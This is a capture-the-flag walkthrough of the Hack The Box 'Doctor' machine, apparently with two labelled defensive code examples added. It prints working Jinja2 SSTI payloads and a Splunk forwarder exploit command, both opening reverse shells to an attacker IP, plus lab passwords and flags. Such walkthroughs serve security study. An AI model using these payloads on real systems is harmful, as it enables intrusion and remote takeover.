Hack-The-Box-walkthrough[doctor]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 26 Sep 2020
IP: 10.10.10.209

User Blood jkr 00 days, 00 hours, 36 mins, 05 seconds.
Root Blood xct 00 days, 00 hours, 36 mins, 12 seconds.


Information gathering

First, run nmap as usual:

root@kali:~/hackthebox/machine/doctor# nmap -sV -v -p- --min-rate=10000 10.10.10.209
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open ssl/http Splunkd httpd

The site on port 80 reveals a domain name:

Send us a message
info@doctors.htb

Add doctors.htb to the /etc/hosts file, then browse to doctors.htb.

It shows a login page. Try some SQL injections.

Nothing works, so register an account and log in.

The page shows nothing useful, so let's check the source code:

<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->
</div>
<!-- Navbar Right Side -->

The commented-out markup links to /archive, so let's go to that page and see what is there.

Hmm, a blank page.

Let's try to submit a new message.

First, let's try a simple HTML h1 tag:

title
<h1>hello</h1>

content
<h1>hello</h1>

The form accepts the h1 tag, but where does the output show up?

Let's check the /archive page.

It is still blank, so let's check the source code of that page.

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title><h1>hello</h1></title></item>

</channel>

Our input is there, but it was not executed. Let's modify the HTML so that it closes the surrounding tags first:

title
</title></item><h1>hello</h1>

content
</title></item><h1>hello</h1>

Let's post this. It worked.

The source code of /archive now reads:

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title></title></item><h1>hello</h1></title></item>

</channel>

This is vulnerable to Server-Side Template Injection (SSTI).
I found an interesting article:

  • Server Side Template Injection
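Seen from the defending side, the /archive feed above is broken because the submitted title is treated as markup. The following is an added example, not code from the target application or from the original write-up: build_feed_unsafe is an assumed reconstruction of the behaviour the output suggests, and build_feed_safe builds the same feed with a serializer so that the page's two test titles stay plain text.

```python
import xml.etree.ElementTree as ET

PAGE_TITLE = "</title></item><h1>hello</h1>"   # breakout title from the page
PAGE_PROBE = "</title></item>{{7*'7'}}"        # Jinja2 probe from the page

def build_feed_unsafe(titles):
    """Assumed reconstruction: titles pasted into the feed text unescaped."""
    items = "".join(f"<item><title>{t}</title></item>" for t in titles)
    return ('<rss version="2.0"><channel><title>Archive</title>'
            f"{items}</channel></rss>")

def build_feed_safe(titles):
    """Serialize the feed from a tree: titles are data, never markup or
    template source, and < > & are escaped on output."""
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    ET.SubElement(channel, "title").text = "Archive"
    for title in titles:
        item = ET.SubElement(channel, "item")
        ET.SubElement(item, "title").text = title
    return ET.tostring(rss, encoding="unicode")

def is_well_formed(xml_text):
    """True if an XML parser accepts the document."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

def item_titles(xml_text):
    """Item titles as a feed reader would see them after parsing."""
    root = ET.fromstring(xml_text)
    return [t.text for item in root.iter("item") for t in item.findall("title")]

if __name__ == "__main__":
    for title in (PAGE_TITLE, PAGE_PROBE):
        unsafe, safe = build_feed_unsafe([title]), build_feed_safe([title])
        print("unsafe well-formed:", is_well_formed(unsafe))
        print("safe titles:", item_titles(safe))
```

Escaping only removes the tag breakout. The template expression stays inert here because the safe builder never hands the assembled text to a template engine; in a Jinja2 application the equivalent is to pass the title as a template variable and never concatenate it into template source.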

Try the Jinja2 basic injection.

First, we are using 49

title
</title></item>{{7*'7'}}

content
</title></item>{{7*'7'}}

If this is executed successfully, the response will contain 7777777.

Boom, it executed successfully. Now let's use "Exploit the SSTI by writing an evil config file" to get a reverse shell.

We are using this exploit:

Exploit the SSTI by writing an evil config file.

# evil config
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}

# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}

# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}

payload

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.7\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Start a netcat listener on port 9001 first, then go to the /archive page.

The page keeps reloading, so let's check our netcat listener.

root@kali:~/hackthebox/machine/doctor# nc -lvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:34444.
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
web@doctor:~$ whoami
whoami
web

We find something interesting in /var/log/apache2/.

In the /var/log/apache2/ directory there is a file called backup. Let's check whether it contains a password or anything else interesting.

web@doctor:/var/log/apache2$ cat backup | grep pass
cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

Now we have found shaun's password, so switch to shaun:

web@doctor:/var/log/apache2$ su shaun
su shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
whoami
shaun
python3 -c 'import pty; pty.spawn("/bin/bash")'
shaun@doctor:/var/log/apache2$
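The leak above happened because a password typed into the email field of the reset form ended up in a request URL, and so in a log file readable by the adm group. The following added example (not part of the original write-up) audits access-log lines for that pattern and redacts the value; the parameter-name list and the two contrast lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request field of an Apache access-log line; the protocol part is optional
# because the line shown on the page has none.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+?)(?: HTTP/[\d.]+)?"')
SECRET_KEYS = {"password", "passwd", "pass", "pwd", "token", "secret"}  # assumed list
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def audit_line(line):
    """Return (findings, redacted_line) for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return [], line
    parts = urlsplit(match.group("uri"))
    findings, redacted = [], line
    for pair in filter(None, parts.query.split("&")):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if key.lower() in SECRET_KEYS:
            reason = "secret-bearing parameter in URL"
        elif key.lower() == "email" and value and not EMAIL_RE.match(value):
            reason = "email field holds a non-email value"
        else:
            continue
        findings.append((parts.path, key, reason))
        redacted = redacted.replace(f"{key}={raw}", f"{key}=[REDACTED]")
    return findings, redacted

def audit(lines):
    """Audit many lines; return all findings and the redacted log."""
    all_findings, cleaned = [], []
    for line in lines:
        findings, redacted = audit_line(line)
        all_findings.extend(findings)
        cleaned.append(redacted)
    return all_findings, cleaned

SAMPLE_LOG = [
    # Line taken from the page's backup file.
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    # Constructed lines for contrast.
    '192.0.2.10 - - [05/Sep/2020:11:20:01 +2000] "POST /reset_password?email=alice@example.com HTTP/1.1" 200 512 "-"',
    '192.0.2.11 - - [05/Sep/2020:11:21:44 +2000] "GET /login?user=bob&password=constructed-value HTTP/1.1" 302 0 "-"',
]

if __name__ == "__main__":
    found, cleaned = audit(SAMPLE_LOG)
    print(found)
    print("\n".join(cleaned))
```

Redaction after the fact does not undo the exposure: a password that reached a log should be rotated, and the form should send its fields in the request body so they never appear in the URL.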

Now we can read user.txt:

shaun@doctor:~$ cat user.txt
cat user.txt
e52b07d06a90865c8c939712f50f9e71

Privilege escalation

Run LinPEAS and find something interesting.

  • LinPEAS - Linux Privilege Escalation Awesome Script

After some Google searching, we find that the following script can be used for privilege escalation:

  • PySplunkWhisperer2_remote.py

Local privilege escalation, or remote code execution, through Splunk Universal Forwarder (UF) misconfigurations. See

  • Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2

for more details.

payload:

python PySplunkWhisperer2_remote.py --lhost 10.10.14.7 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.7 5555 >/tmp/luci11"'

Run this, and we get a root shell:

root@kali:~/hackthebox/machine/doctor# python PySplunkWhisperer2_remote.py --lhost 10.10.14.7 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.7 5555 >/tmp/luci11"'
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpiRqdZO.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.7:8181/
10.10.10.209 - - [29/Sep/2020 13:45:08] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

The netcat listener on port 5555 catches the root shell:

root@kali:~/hackthebox/machine/doctor# nc -lvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:48386.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
# cd /root
# ls
root.txt
# cat root.txt
316ae3165720f8c125e259d7a3290c85

Summary of knowledge

  • Server Side Template Injection
  • Jinja2 Basic injection
  • Exploit the SSTI by writing an evil config file
  • password leaked in /var/log/apache2/backup
  • Splunk Universal Forwarder (UF) misconfigurations
  • use PySplunkWhisperer2_remote.py to get root shell

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…